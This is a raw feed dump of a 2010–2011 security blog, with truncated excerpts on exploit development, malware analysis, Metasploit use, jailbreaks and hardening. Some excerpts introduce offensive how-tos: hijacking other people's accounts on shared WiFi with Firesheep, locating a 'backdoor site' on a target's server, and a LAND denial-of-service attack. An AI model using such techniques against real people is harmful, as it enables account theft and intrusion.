tag:blogger.com,1999:blog-78328878320113824992011-12-27T21:08:58.275+08:00c0decstuffnoreply@blogger.comBlogger1371100tag:blogger.com,1999:blog-7832887832011382499.post-74356959195514143032011-12-20T02:58:00.001+08:002011-12-20T03:08:14.933+08:00

Introduction In Virtual LAN or VLAN is a group of hosts communicate with each other, even thoughthey are in different physical location. Virtual LAN provides location independence to the users, able to save the bandwidth, manage the device, cost effective for the organization are some of the facilities provided by the Virtual LAN. VLAN is based on Layer 2 “Data link” of the OSI Model. The OSI

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-33749294437429059662011-12-20T02:13:00.000+08:002011-12-20T02:13:07.224+08:00

Recently I have been testing out Microsoft’s “Enhanced Mitigation Experience Toolkit” (EMET) tool for exploit mitigation. This is a free tool and is designed to harden or secure applications without having to recode them. One exploit I used to test was Adobe Flash’s “Action script type confusion” vulnerability (CVE-2010-3654). This vulnerability affects version 10.1.53.64 and below. I used the

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-19011945236961841072011-12-05T03:28:00.001+08:002011-12-05T03:29:54.102+08:00

Foncy Foncy is a sms android malware which targets european countries, with few analysis : kaspersky We can analyze it (sample sha256: 98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2) with Androguard, and Ded decompiler: And we can obtain easily where permissions are used: The sendTextMessage method is called 5 times in the bytecodes. If you would like to have a better view

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-74279299274710482472011-11-27T22:31:00.000+08:002011-11-27T22:31:23.832+08:00

How to fix iOS 5 Problems ? Believe me almost every user of iOS 5 must have been faced with such errors while updating to iOS 5. The problem might have been a result of excessive phone calls, downloading, updating and pinging Apple’s servers. There is nothing much to worry about, but the only solution is to carry on with the updating trials. The following tips work and all only for those who are

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-68139749498224099932011-11-27T22:04:00.000+08:002011-11-27T22:04:42.970+08:00

Wait, don’t get your hopes up! Yes, Ac1dSn0w is a new jailbreak tool but it doesn’t bring a new “jailbreak” for iPhone 4S, iPad 2 or untethers iOS 5. Ac1dsn0w jailbreak tool developed by PwnDevTeam which makes jailbreaking much easier. Below we’ll explain more. Ac1dSn0w beta version is now available which is currently available only for Mac OS X users. It does a tethered jailbreak of iOS 5 and

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-16828443800540395642011-11-17T06:50:00.013+08:002011-11-17T07:34:18.207+08:00

Facebook: Anatomy of Self-Inflicted Javascript InjectionMany are already familiar with "likejacking" (a form of "clickjacking") in which a user is tricked into clicking on and interacting with the Facebook "like" button -- this has been one of the most common vectors of abusing Facebook. For example, the "like" button may be hidden behind an image such as a picture of an embedded YouTube video

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-68169224553615448712011-11-14T23:52:00.000+08:002011-11-14T23:52:59.118+08:00

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-81881059858134099962011-11-14T05:02:00.004+08:002011-11-14T05:14:18.687+08:00

A nice new feature of HTML 5 is local storage. Briefly, this is a client side storage option that can be easily accessed via JavaScript. The benefit of local storage over other client side storage options is that local storage allows more storage space than other options (cookies, flash obj, etc). In addition, unlike cookies, the data is not automatically appended to every request by the browser.

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-12895627040914715382011-11-13T00:26:00.000+08:002011-11-13T00:26:25.066+08:00

MS11-083 has arrived and people are getting both excited and scared, it looks like its going to be the next MS08-067. Which if you remember, Conficker used to bend windows over and have a jol. Time for a honeypot? In anycase I took a moment and decided to write a script that would capture potential MS11-083 traffic in an attempt to capture this exploit in the wild (once its out there, might

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-45668623115684694622011-11-09T08:40:00.003+08:002011-11-09T08:43:17.997+08:00

Earlier this week Symantec released an update on Duqu. Apparently an installer was found for Duqu (dubbed Stuxnet II) that used a Microsoft Zero-day: “The installer file is a Microsoft Word document (.doc) that exploits a previously unknown kernel vulnerability that allows code execution. We contacted Microsoft regarding the vulnerability and they’re working diligently towards issuing a patch

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-87048298544456163402011-11-09T08:35:00.000+08:002011-11-09T08:35:38.008+08:00

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-59693102805485422442011-11-09T08:14:00.000+08:002011-11-09T08:15:00.000+08:00

Pull Process & Network Connections from a Memory Dump In the previous article, we learned how to pull passwords from a memory dump file. This time, we will cover viewing a process list and network connections out of captured memory files. Volatility’s “pslist” command can be used to view the processes that were running on a Windows system: volatility pslist -f memdumpfilename.raw –profile=

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-26696565397182753862011-11-07T19:38:00.002+08:002011-11-07T19:44:02.709+08:00

The Rambling IntroThis is a fun one I came up with while looking at a site this week. I feel sure that somebody else must have come up with this before me, but I’ve never seen anyone blog about it or anything, so here goes. The back story is that somebody posted a link to some “password strength checker” website, in which of course you type your password and it tells you how long it thinks it

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-78764934683758427262011-11-07T06:08:00.000+08:002011-11-07T06:08:06.117+08:00

In this post I’ll be writing about a ROP (Return Object Programming) exploit that I had recently developed for a vulnerability I had discovered in an application called “RemoteExec”. The vulnerability is caused when opening a .rec file containing an overly long line triggering a stack-based buffer overflow. It was first published in March 2010 reported in version 4.04 and fixed in version

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-38566113056701012232011-11-04T22:14:00.000+08:002011-11-04T22:14:50.213+08:00

Sn0wbreeze v2.8b9 has been released by iH8snow the well known hacker to jailbreak iOS 5.0.1 beta, the new jailbreaking tool fixes ibooks sandbox crashing issues,  location services issues with iPhone 3GS users running the iPad baseband finally Sn0wbreeze v2.8b9 fixes many issues and bugs. Notes: Don’t forget it’s a tethered jailbreak for all device expect iPhone 3G old bootrom and it does not

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-42679744899167657322011-10-29T01:37:00.000+08:002011-10-29T01:37:33.383+08:00

My Russian colleagues Aleksandr Matrosov and Eugene Rodionov have found some time to do some more analysis on Win32/Duqu. (Don’t you guys sleep?) In the previous post (http://blog.eset.com/2011/10/25/win32duqu-it%e2%80%99s-a-date) they concentrated on analyzing the Duqu configuration file format and extracting the exact date on which the system was infected. This time they investigated Duqu’s

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-49171637741550836502011-10-28T04:45:00.007+08:002011-10-28T04:56:35.677+08:00

1. Summary: When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment. --------------------------------------------------------------------

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-25373787829237731082011-08-19T07:08:00.000+08:002011-08-19T07:08:07.093+08:00

Released MS11-058 to address two vulnerabilities in the Microsoft DNS Service. One of the two issues, CVE-2011-1966, could potentially allow an attacker who successfully exploited the vulnerability to run arbitrary code on Windows Server 2008 and Windows Server 2008 R2 DNS servers having a particular DNS configuration. We’d like to share more detail in this blog post and help you make a

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-77247823833353289442011-08-19T07:03:00.000+08:002011-08-19T07:03:17.435+08:00

An international team of forensics experts, led by SANS Faculty Fellow Rob Lee, created the SANS Investigative Forensic Toolkit (SIFT) Workstation and made it available to the whole community as a public service. The free SIFT toolkit, that can match any modern forensic tool suite, is also featured in SANS' Advanced Computer Forensic Analysis and Incident Response course (FOR 508). It

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-55074862534901866482011-07-08T04:48:00.002+08:002011-07-08T05:13:53.108+08:00

Not that this is any major feat, but I thought it would do as a nice primer to investigating bugs Immunity Debugger and mona.py and exploiting them with Metasploit. I was researching a vulnerability today, Metasploit has a module called mailenable_login with a target of MailEnable 2.35. Doing some research into the exploit, it is a buffer overflow, and not just 2.35 is vulnerable to this

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-79043565518693718392011-07-08T04:29:00.001+08:002011-07-08T04:32:55.682+08:00

So we’ve all been unlucky enough to have a meterpreter session die on us, and then we’ve all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another. No one I know in the White Hat scene likes to use any form of persistence with a payload; and you’d be nuts to use the bind_tcp option through fear of leaving it running. (I’ve heard horror

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-40085799187249391392011-07-08T04:18:00.004+08:002011-07-08T04:35:30.151+08:00

I know how we all have our own way of copy/paste from console windows but metasploit has just introduced a new feature as of r13028. You can now save all of the output of metasploit (including meterpreter) to a file using the spool command: spool /root/msf3_output.txt [OWNAGE GOES HERE] spool off Or to ensure you always have a log of what you are doing add to the ~/.msf3/msfconsole.rc file (

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-10172232075932008982011-07-08T02:15:00.000+08:002011-07-08T02:15:40.185+08:00

The idea of this post is to show the flaws in the packages distribution of the project MacPorts for Mac OS XThe MacPorts use:a) To update your repository rsync serverb) The packages are distributed via http / ftpc) Before installing a new package it is checked with the MD5/SHA1 in the local repository To perform the attack we need to do the following tasks:1) Prepare the rsync server on the

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-80958018348686368302011-07-05T08:37:00.001+08:002011-07-05T08:40:25.380+08:00

When Google released its +1 button, I wanted to be able to use it in a PHP application. Specifically,I wanted to be able to obtain the counter for a series of links in order to rank the links by popularity. Unfortunately, Google did not offer a Google +1 true API at the time (and still does not offer one as far as I know).  However, given that the button are being displayed all over the web

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-13499527812688568682011-07-04T06:40:00.001+08:002011-07-04T06:47:01.040+08:00

Some of the guys I hack with and I have been talking about the “core” toolset in pentesting… like what could you absolutely not go in without? What we came up with is:nmap metasploit ettercap burp Wireshark There are tons of tools that came close to that bracket, other proxies, scanners, other MiTM tools, but these tools have a special place in our hearts. These tools have encompassed so

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-75120751272471366702011-07-04T06:31:00.000+08:002011-07-04T06:31:51.868+08:00

Over the past few years, there have been various high-profile incidents and concerns with the Certificate Authority-based infrastructure that underpins https connections. Various different efforts are underway to tackle the problem; many are enumerated here: http://googleonlinesecurity.blogspot.com/2011/04/improving-ssl-certificate-security.html And in terms of things baked directly into the

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-72972838644391733952011-07-04T06:24:00.001+08:002011-07-04T06:26:50.626+08:00

In this series of blog posts, I will be documenting my journey into the art of exploitation.  My goal for this series is to experiment with some of the challenges that are out there and hopefully provide some guidance for others in my shoes.  I am targeting those of you with moderate amount experience in exploitation.  Hopefully, I will further my own knowledge and yours (the reader).What

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-44202888318488428452011-07-03T04:34:00.000+08:002011-07-03T04:34:22.758+08:00

Occasionally I have to analyze tcp-streams, and occasionally I came to a point where i had to extract files out of huge dumps. What I found during my last research about a year ago was not really usable - i hacked together a few lines of perl to extract exactly what i wanted - this didn't deliver exact files, but was enough to help me solve a problem. Jim Clausing, one of the more practical

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-4629795936630503692011-07-03T04:31:00.000+08:002011-07-03T04:31:27.935+08:00

Finally: I have "The List" - I even posted where it is to find, for what I read was, that the security-teams of the major providers affected did their work properly deactivating all the affected accounts. http://windowslivewire.spaces.live.com/blog/cns!2F7EB29B42641D59!41528.entry?wa=wsignin1.0&sa=363915619http://news.bbc.co.uk/2/hi/technology/8292928.stm This is currently, three days after (

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-17667440829173624042011-07-03T04:27:00.000+08:002011-07-03T04:27:05.014+08:00

Most of you might know dnstunnel. Johannes Ullrich from Sans lists a poor mans dns-filetransfer using xxd which i think is a nice idea working on most unix boxes for xxd seems to be commonly installed.

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-46446411357171380562011-06-23T23:27:00.001+08:002011-06-23T23:27:09.719+08:00

by Solar Designer and Dug Song March 19, 2001 Last revised: June 6, 2010 This article demonstrates several weaknesses in implementations of SSH (Secure Shell) protocols. When exploited, they let the attacker obtain sensitive information by passively monitoring encrypted SSH sessions. The information can later be used to speed up brute-force attacks on passwords, including the initial login

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-85143122147146459952011-06-23T00:56:00.000+08:002011-06-23T00:56:27.819+08:00

These are the new features included in v2.1 (transcription of CHANGELOG.txt): ---------------- DotDotPwn v2.1 Release date: 29/Oct/2010 (PUBLIC Release at BugCon Security Conferences 2010) Release date: 14/Oct/2010 (NON-PUBLIC Version) Changes / Enhancements / Features: * STDOUT module implemented to be used as you wish (Read the EXAMPLES.txt to see some examples) * TFTP Module implemented * -k

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-30675350208263103912011-06-23T00:54:00.000+08:002011-06-23T00:54:27.625+08:00

Hell Yes !!!! B-), a few weeks ago, my brother chr1x from CubilFelino Security Labs (published a tool to detect directory traversal vulnerabilities in FTP/HTTP servers. It only relied upon 2 .txt files (databases) with the payloads to be lauched to the target. Then, some cool ideas came into my mind, so, I wrote the c0de from the skratch and in a modular basis, as well as, I included a lot

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-67278730322320137742011-06-23T00:22:00.001+08:002011-06-23T00:25:21.894+08:00

an SSL-capable intercepting proxy mitmproxy is an SSL-capable, intercepting HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly. mitmdump is the command-line version of mitmproxy, with the same functionality but without the frills. Think tcpdump for HTTP. FeaturesIntercept and modify HTTP traffic on the fly Save HTTP conversations for

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-38137080202876517052011-06-22T01:58:00.001+08:002011-06-22T01:58:54.087+08:00

After creating the WordPress Brute Force Tool last weekend, I decided to create a bigger project out of it, called WPScan. WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. Its intended use it to be for security professionals or WordPress administrators to asses the security posture of their

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-12913528828097664512011-06-22T01:53:00.000+08:002011-06-22T01:53:19.019+08:00

“Tomahawk” is the name of a popular cruise missile developed by General Dynamics in the seventies. But it is also the name of a free tool which helps to stress test security devices like firewalls or IDS. It has been written by Brian Smith from TippingPoint. This is well-known manufacturer of IDS solutions, acquired by HP in 2010. Testing IDS solutions has always been a nightmare. Just

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-24295899202350417912011-06-22T01:26:00.001+08:002011-06-22T01:32:06.636+08:00

Every day modern web applications are becoming increasingly sophisticated, and as their complexity grows so does their attack surface. Previously we introduced open source tools such as Skipfish and Ratproxy to assist developers in understanding and securing these applications. As existing tools focus mostly on testing server-side code, today we are happy to introduce DOM Snitch — an

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-17127888659097503602011-06-21T22:38:00.002+08:002011-06-22T01:40:25.700+08:00

Metasploit is a free, open source penetration testing solution. Metasploit now ships with 698 exploit modules, 358 auxiliary modules, and 54 post modules. 11 new exploits, 1 new auxiliary module, and 15 new post modules have been added since the last release. New features include remote registry commands for Meterpreter, import parsers moved to nokogiri streaming parsers (for quicker parsing

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-60675113543033977242011-06-21T22:30:00.001+08:002011-06-22T01:41:14.854+08:00

There’s nothing new in Brazilian cybercriminals exploiting social networks to distribute their malicious code. Orkut was first, followed by Twitter, and now it’s Facebook’s turn. Facebook is becoming increasingly popular in Brazil and we are witnessing more and more Brazilian bad guys switching their focus to it. We received some proof this weekend: a Brazilian instant message (IM) worm

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-74494157866131950032011-06-21T22:20:00.001+08:002011-06-21T22:32:37.254+08:00

Rumors and news regarding hacker group LulzSec have been afloat on Twitter today. The rumors circle around this Pastebin post which claims that LulzSec had acquired the UK's 2011 census data.Note that anybody can post to pastebin.com. Soon after, news came that Scotland Yard has arrested a 19-year-old in Essex. Should be interesting to see what comes next… Will the UK's census data be

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-76156964594760589102011-06-21T01:38:00.000+08:002011-06-21T01:38:37.248+08:00

When writing the SET interactive shell for the Social-Engineer Toolkit, I had to ponder what the best route in creating a flexible reverse shell. This backdoor had to be a familiar programming language (to me) and be modular for me to add new things onto it. Python being my strongest language posed some significant challenges as it was not a compiled language. Fortunately there is a way to

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-51676794110061193342011-06-19T23:20:00.000+08:002011-06-19T23:20:29.810+08:00

On a cold and rainy Thursday morning, I thought that it would be a good time to write a post on searching the Windows registry using PowerShell. In an Incident Response scenario you may want or need to do some live analysis on a compromised system, and part of this analysis may be to search the registry for some sort of artifact that is appropriate. Using PowerShell can help you do this in a

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-49791866869405322582011-04-11T02:22:00.001+08:002011-06-19T23:38:02.580+08:00

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address) Spooftooph

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-57620212532419829782011-04-07T03:24:00.001+08:002011-06-19T23:39:59.727+08:00

I spent a half year writing software art to generate special effects for Tron Legacy, working at Digital Domain with Bradley "GMUNK" Munkowitz, Jake Sargeant, and David "dlew" Lewandowski. This page has taken a long time to be published because I've had to await clearance. A lot of my team's work was done using Adobe software and Cinema 4D. The rest of it got written in C++ using

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-61391625662509638812011-03-11T14:57:00.001+08:002011-06-19T23:42:50.856+08:00

This week, Microsoft issued MS11-012 to resolve yet another batch of vulnerabilities in win32k.sys. The bulletin addressed three elevation of privilege vulnerabilities in window class data handling (somewhat related to those patched in MS10-073) and an additional two in window message handling. The latter were quite interesting as they were not your typical vulnerability class, but rather subtle

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-82080095057066029332011-02-27T17:12:00.001+08:002011-06-19T23:57:47.344+08:00

This is the first in an intended series discussing analysis on a compromised XP SP3 machine. Multiple malware components were found on the system and I shall try to describe the analysis processes I used in an attempt to provide something of interest. Emerging Threats signature-based alert The first indicator of any issue was the firing of an Emerging Threats signature ET 2010823 on an

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-31404146796098892692011-02-27T17:01:00.001+08:002011-06-20T00:09:54.456+08:00

Peeling Apart TDL4 and Other Seeds of Evil Part II (please excuse the lousy formatting, blogger doesn't handle these posts too well) This is the second in an intended series discussing analysis on a compromised XP SP3 machine. Multiple malware components were found on the system and I shall try to describe the analysis processes I used in an attempt to provide something of interest. In some

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-41527931955427630162011-01-17T12:15:00.013+08:002011-06-20T00:11:07.169+08:00

Good Memory is a rogue application. A rogue application tries to trick you by displaying false positive/misleading scan results report, which says that your computer has a problem, or infected with viruses or trojan, but you will not be able to fix it before you purchase. Variants of the rogue defragmenter: * Fast Disk * Disk OK * My Disk * Memory Fixer * HDD Fix * Scanner * HDD Low * Disk

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-90850678731550680472011-01-13T11:16:00.002+08:002011-06-20T00:13:25.355+08:00

by Nicolas Collignon et Jean-Baptiste Aviat (04/06/10) ------------[ In-memory extraction of SSL private keys ]---------------- Cet article est disponible en francais à passe-partout.html.fr. The tool passe-partout presented all along this tip can be found at passe-partout. --[ 1. Introduction ]--------------------------------------------------- Asymetric cryptography usage is growing for

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-17085731241135654812011-01-03T17:13:00.002+08:002011-06-20T00:18:52.083+08:00

Happy New Year everyone! Here is a nice new addition to bypass UAC through meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson (http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) on bypassing Windows UAC. This method takes advantage of process injection that has a trusted Windows

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-16015487582140276462011-01-03T03:41:00.001+08:002011-06-20T01:08:59.185+08:00

Many books and papers cover the subject of Rootkits. I wrote this article to describe my first steps. Here, you will learn what a rootkit is and how does it work. Also you will find an attack using DKOM.For this article I’m using: Windows XP SP3 WDK Windows Driver Kit Some debuggers: WinDbg, DebugView Coffee and good cakes 1. Rootkits1.1. What is a Rootkit?First and foremost, a rootkit is not a

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-89915441527781484912011-01-02T18:10:00.004+08:002011-06-20T01:14:46.426+08:00

This tries to solve bug 179 where DokuWiki can not write to directories it created itself. It does so by using FTP to log into your server and creating the directory that way. It requires the FTP PHP module to be installed on the server. Type: Boolean Default: 0 As the name suggests, this is a hack and not recommended. Safemode itself is a setting that even the developers of PHP despise, it will

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-5500832505156286842010-12-29T01:18:00.006+08:002011-06-20T01:16:17.453+08:00

I recently got the opportunity to sit in on (fellow SANS instructor) Lenny Zeltser's "Reverse Engineering Malware" class. It's a terrific course, and I highly recommend it. During the material on memory analysis, we were comparing the output of "volatility pslist" and "volatility psscan2". It's relatively straightforward for rootkits to hide themselves from pslist, but psscan2 does a much

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-52119462918816737072010-12-22T07:47:00.001+08:002011-06-20T01:26:41.057+08:00

I've encountered one trojan who ran already as Administrator and tried to run privilege escalation exploit against himself, so he can run as SYSTEM. This is what made me write this post : Let's say there are 2 programs vulnerable to remote-code-execution bug. 1. One is running as SYSTEM 2. One is running as Administrator. Little pre-post-information regarding exploitation : If you run your

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-78581321843445436162010-12-22T06:31:00.001+08:002011-06-20T01:37:54.632+08:00

In this post we'll try to run Aurora as non-administrative user, and debug ad_1_.jpg which used by the attackers right after the attack. Well, I was very curious about other files in the attack, after not able to unpack the msconfig32.sys, and thought, maybe other files will give me clues on msconfig32.sys and might give me a way of unpacking it. I've looked into USCERT advisory regarding

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-14006108977488971582010-12-21T06:34:00.001+08:002011-06-20T01:41:00.461+08:00

In this tut you'll be learning how to access someone's facebook/youtube and many other accounts who is using the same WiFi as you. You need Mozilla Firefox. Firesheep - firefox add-on: http://codebutler.github.com/firesheep/ WinPcap if you have Windows: http://www.winpcap.org/install/default.htm   Install wincap then drag the Firesheep add on and put it on the Firefox icon. Firefox will open and

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-36878935559965179762010-12-21T03:43:00.002+08:002010-12-21T03:43:41.777+08:00

It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as Web/FTP/TFTP servers,Web platforms such as CMSs,ERPs,Blogs,etc.Also,it has a protocol independent module to send the desired payload to the host and port specified. On the other hand,it also could be used in a scripting way using the STDOUT module.It's written in perl programming

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-8952568494508960852010-12-21T03:00:00.004+08:002010-12-21T03:13:54.201+08:00

BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which command module and at which target. BeEF hooks one or more web browsers

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-21019040041503905122010-12-21T02:42:00.001+08:002011-06-20T01:44:14.478+08:00

Samurai Web Testing Framework - Web penetration testing live CD built on open source software The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-22045822598235950352010-12-21T02:25:00.002+08:002011-06-21T00:45:39.149+08:00

FREE PC Security for Home Users The Secunia PSI is aFREE security tool designed to detectvulnerable andout-dated programs and plug-ins which expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus and are therefore increasingly "popular" among criminals. The only solution to block these kind of attacks is to apply

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-40016853446935338682010-12-16T22:45:00.004+08:002011-06-21T00:46:52.708+08:00

Yeah, you know the deal. Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack). I know the first thing that comes to your mind is: “LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…”Not so fast. I’ve actually found this quite useful. It requires a very small amount of packets to null-route a remote computer

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-27878137401231714802010-12-06T02:40:00.002+08:002011-06-21T00:43:59.836+08:00

Finding Backdoor Site To find backdoor site go toCode:http://www.domaintools.com/and in Whois Lookup enter your TARGET site  As a result you'll get Whois Record Look for Reverse IP In our case 25 other sites hosted on this server. Click on it to see names of the hosted sites on the same server. You will see few of them, to see all, click on more... To see them all you must be a member. You

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-39922183261429315362010-11-30T17:17:00.004+08:002011-06-20T01:42:33.846+08:00

http://c0decstuff.blogspot.com/2010/11/armitage-v11.html Armitage - Cyber Attack Management for Metasploit Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don't use

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-16769841034367215992010-11-30T17:15:00.001+08:002011-06-20T01:02:12.885+08:00

Arachni v0.2.1 - Web Application Security Scanner Framework Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart,it trains itself by learning from the HTTP responses it receives during the audit process.Unlike other scanners,Arachni takes into account the

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-40139747207200974432010-11-23T05:45:00.009+08:002011-06-20T00:56:31.713+08:00

Play With Routers, & Node EnnumerationThis article describes how I was able to find linksys routers open to vulnerability. If you have a Linksys router make sure you have taken the proper steps to securing yourself. There is a follow up to this article here. I scanned a rather large portion of IP's (2 class C IP ranges). If you don't know what port scanning is click here. There are

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-87475482846394861232010-11-20T23:57:00.001+08:002011-06-21T23:17:21.936+08:00

Backward disassembler for ROP exploitation bdasm is a PyCommand that I wrote for Immunity Debugger (v 1.73) which can search the address space of a process for a certain opcode/instruction and dissasemble backward and forward for a  specified number of instructions. This is especially useful in the exploit development process when existing gadget finding tools do not produce the results you

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-87185717074541027992010-11-20T23:47:00.001+08:002011-06-21T00:59:18.519+08:00

Application Layer DDoS Simulator https://sourceforge.net/projects/ddosim/. ddosim is a tool that can be used in a laboratory environment to simulate a distributed denial of service (DDOS) attack against a target server. The test will show the capacity of the server to handle application specific DDOS attacks. ddosim simulates several zombie hosts (having random IP addresses) which create

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-81709907964711322472010-10-05T16:59:00.002+08:002011-06-21T23:03:13.824+08:00

Google Chome + Google SSL default search engineHere's just a short and simple tutorial for those looking to set google's ssl search as their default search engine in Google Chrome. I found it to be pretty useful, and I hope that you do as well. 1) Go to Chrome's option menu (top right wrench->options [in the latest Chrome beta]) 2) Under the "Basics" tab, click the "Manage" button next to the "

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-36485778282576855452010-10-03T09:07:00.004+08:002010-10-03T09:12:01.553+08:00

Methods to block SSH attacksMethods: 1. Allow the IPs you would like to have access to SSH through your firewall. Example:  iptables -A INPUT -i eth0 -s 10.10.10.10 -p tcp --dport 22 -j ACCEPT 2. Change SSH port. Example: Edit your ssh configuration file under /etc/ssh/sshd_config and add/replace this line: Port 6445 3. Use a utility like BFD, BlockHosts and DenyHosts 4. Use ip tables to limit

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-25796118413797983752010-10-03T07:09:00.001+08:002011-06-20T01:29:49.595+08:00

Configuring Granular Password Settings in Windows Server 2008 � The Easy WayThis article will demonstrate �The Easy Way� of how to handle Granular Password Policies � also known as Fine-Grained Password Policies - in a Windows Server 2008 domain environment. Different approaches Like with many other areas of Windows administration you have several different options when it comes to handling the

